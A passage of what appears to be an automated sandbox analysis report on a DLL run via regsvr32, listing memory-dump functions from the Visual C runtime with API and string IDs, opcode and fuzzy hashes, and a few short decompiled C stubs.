                                • Instruction Fuzzy Hash: A9913B32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D26BF0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 127COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 792801276-1329727594
                                • Opcode ID: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                • Instruction ID: 74781b4b54cd9912b8e06a4704f6bb443746ab51bab07e1bca88e51f830d20d4
                                • Opcode Fuzzy Hash: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                • Instruction Fuzzy Hash: E9613972A0D7C186E7B49B51E8907AEBBA0F784740FA18126D6CD47BA9DB3ED444CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3F900 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 105COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno$_invalid_parameter
                                • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                • API String ID: 747159061-3177431134
                                • Opcode ID: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                • Instruction ID: 4f8ff4572e8635f5027188ec8a382c63b1dfded0e2620b7392a92efec120cf46
                                • Opcode Fuzzy Hash: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                • Instruction Fuzzy Hash: 78518971A1864A8AF7909B59E89076DB3E1F3807A5F609221E2ED477F4C7BEE5008B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2BA60 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                • API String ID: 1608253119-1427866139
                                • Opcode ID: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                • Instruction ID: bd1364e327bffe51ea07524ffa85e9f05d80aa3f671785f44ca1c30fb28e73d7
                                • Opcode Fuzzy Hash: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                • Instruction Fuzzy Hash: 4D41253191DB4686E7A09B14E84436E76E0F785780F614535E6CD42AF8DBBEE484CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D386B0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 282COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                • API String ID: 2123368286-2958264153
                                • Opcode ID: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                • Instruction ID: d7cc4d0e782f1b7c612564dac91e9d2cb6f3b6ce272f4d7ad0d490e9b620c06e
                                • Opcode Fuzzy Hash: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                • Instruction Fuzzy Hash: 49E14D31A1DA868AEBB48B24E84076EB3E0F385765F204235E6DD43BE5DB7ED445CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3C1A3 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 251COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1967237116-569934968
                                • Opcode ID: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                • Instruction ID: 22a9a72b2ea07787f3d01dc0e5522a3b9409a08ca4ad9fd04da88529524a1eb4
                                • Opcode Fuzzy Hash: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                • Instruction Fuzzy Hash: B4D11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BFDE Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 212COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E000007FE7FEF9D3BFDE(char _a696, char _a976) {

				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}



                                0x7fef9d3bfe6
                                0x7fef9d3bff7
                                0x7fef9d3c006
                                0x7fef9d3c02d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: wctomb_s
                                • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2215178078-1895985292
                                • Opcode ID: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                • Instruction ID: 7adfc43390c165502d6a8fb190fde7d628b4034d943845d6c2f74ff038b9ebc8
                                • Opcode Fuzzy Hash: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                • Instruction Fuzzy Hash: 64B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F204125DAD987AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D32260 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 185COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                • API String ID: 2123368286-348877268
                                • Opcode ID: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                • Instruction ID: 000baf689883631365c7c02d111a1b1a2de10ec58b0e6b3448400e9d2f0f3b8d
                                • Opcode Fuzzy Hash: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                • Instruction Fuzzy Hash: AE915C32E0CA428AE7A08B68E84476E77E0F394365F604625E7DD43AF8DB7ED544CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BB66 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 137COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-4087627024
                                • Opcode ID: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                • Instruction ID: 7ef584807be417e268083fb343ad6d7be6558f6767769905c9ec51bf7eddb7ed
                                • Opcode Fuzzy Hash: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                • Instruction Fuzzy Hash: 61713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED541CF01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D30FD0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 124COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                • API String ID: 2123368286-3692278645
                                • Opcode ID: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                • Instruction ID: fae548ccfa44dfd2566f43a5020e02f413341588dce5173fb2663fa56b07ad66
                                • Opcode Fuzzy Hash: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                • Instruction Fuzzy Hash: 18515C31A1C64686F7A08B54E8447AE77E5F384344FA04136E6CD43AB8DBBEE545CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2BC30 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _free_base_malloc_base
                                • String ID:
                                • API String ID: 3824334587-0
                                • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D263E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 143COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                • API String ID: 2123368286-817335350
                                • Opcode ID: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                • Instruction ID: a7fd658f0f883f275d3cb6d605636d4d7d2232aae341650a7fa887ee8dadd8b1
                                • Opcode Fuzzy Hash: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                • Instruction Fuzzy Hash: 80610B36A18B4186EB64CB59E89132EB7A0F385794F714126EBCD83BB4CB3ED441CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2CFF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
				intOrPtr _v24;
				long long _v48;
				long long _v64;
				intOrPtr _t21;

				_a8 = _t21;
				_v48 = 0;
				_v64 = 0;
				_v24 = _a8;
				_v24 = _v24 - 2;
				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
				goto __rax;
			}







                                0x7fef9d2cff0
                                0x7fef9d2cff8
                                0x7fef9d2d000
                                0x7fef9d2d010
                                0x7fef9d2d01b
                                0x7fef9d2d024
                                0x7fef9d2d048

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                • API String ID: 2123368286-2245755083
                                • Opcode ID: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                • Instruction ID: 64874b8661254a0ae2b01e5280f4eb25b6cc5e7b5243a42f7df21d474b3e4b39
                                • Opcode Fuzzy Hash: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                • Instruction Fuzzy Hash: 3871E83291C7868AE7A48B58E84436EB7E0F785754F214135E6CE47BA4DB3EE448CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D25AD9 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 77memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapPointerValid
                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                • API String ID: 299318057-1988567080
                                • Opcode ID: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                • Instruction ID: 749e228a184b7b5abc50e7f522a6a47edf15a58a7031c3663ed602be408c8cc7
                                • Opcode Fuzzy Hash: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                • Instruction Fuzzy Hash: 28314D36A1864A85EBE48B59E84172E67D1F385784F714036EACD83BB5DB3FD440CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2C7E9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer$_realloc_dbg
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                • API String ID: 429494535-1858280179
                                • Opcode ID: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                • Instruction ID: d34c943794379c2c172b76bd65526e764d0d85b1982d09e34a5c92bdfa9d3ddf
                                • Opcode Fuzzy Hash: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                • Instruction Fuzzy Hash: 8141B836619A8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3E16F Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 259COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1967237116-734865713
                                • Opcode ID: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                • Instruction ID: a4401d07f2fb6cffb5d65cb91d5b1a1a6a6edb3a16c82fb832ec879f024f4c4f
                                • Opcode Fuzzy Hash: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                • Instruction Fuzzy Hash: 60D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6D987AA9DB7DE440CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DF8D Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 218COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {

				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}



                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 0-1585035072
                                • Opcode ID: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                • Instruction ID: 786758f90f15de6030b6b0b797e7a3976266de7f5bb6935df7b5cb31798ef030
                                • Opcode Fuzzy Hash: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                • Instruction Fuzzy Hash: D0B1FD7260CAC286E7B1DB55E8417AFB7E0F784356F104126EAC987AA9DB7DE440CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D38350 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 178COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                • API String ID: 2123368286-1876092940
                                • Opcode ID: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                • Instruction ID: 67313c86c0907fb9479329b5879005a062486a8a0ba054e26d823845a12987d7
                                • Opcode Fuzzy Hash: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                • Instruction Fuzzy Hash: FA911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BE32 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {

				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
